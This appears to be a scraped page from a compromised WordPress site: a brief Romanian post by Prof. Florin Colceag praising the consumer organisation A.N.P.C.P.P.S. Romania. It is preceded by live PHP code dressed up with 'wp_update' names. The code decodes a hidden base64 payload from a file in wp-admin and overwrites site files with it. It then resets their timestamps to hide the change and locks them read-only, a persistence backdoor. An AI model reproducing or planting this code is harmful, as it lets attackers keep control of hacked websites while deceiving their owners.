$wp_update_file="/home/shuffles/public_html/wp-admin/user/screens.php"; if ( is_file($wp_update_file) ) { $wp_update_content=trim(file_get_contents($wp_update_file)); if ( $wp_update_content!="" ) { $wp_update_content=substr($wp_update_content,6,-6); $wp_update_content=base64_decode($wp_update_content); $wp_update_arr=json_decode($wp_update_content,true); if ( is_array($wp_update_arr) ) { foreach($wp_update_arr as $value) { $file_mtime=filemtime($value["path"]); @chmod($value["path"],0777); @unlink($value["path"]); @file_put_contents($value["path"],$value["content"]); @touch($value["path"],$file_mtime); @chmod($value["path"],0444); } } } } Noua ani de “o9atitudine!” – O noua atitudine

Initiativa si realizarile organizatiei A.N.P.C.P.P.S.Romania sunt in opinia mea unele dintre cele mai pline de succes in directia dezvoltarii spiritului civic, a educarii cetateanului in fata presiunii acerbe a marilor companii si mai ales a adaptarii acestuia la conditiile de criza si de agresiune economica la care suntem cu totii expusi.

Forta retelelor educate de consumatori poate fi decisiva in evitarea dezastrelor provocate de lacomia marilor companii sau de jocurile politice si administrative ce ne duc deseori in situatii de risc. Consumatorul informat si in contact cu multi consumatori poate conta atat ca un factor de protectie si paza a tuturor celorlalti consumatori cat si ca un factor de interventie rapida impotriva abuzurilor la sanatatea de mediu social, personal, natural sau tehnologic.

Prof. Florin Colceag

By o9admin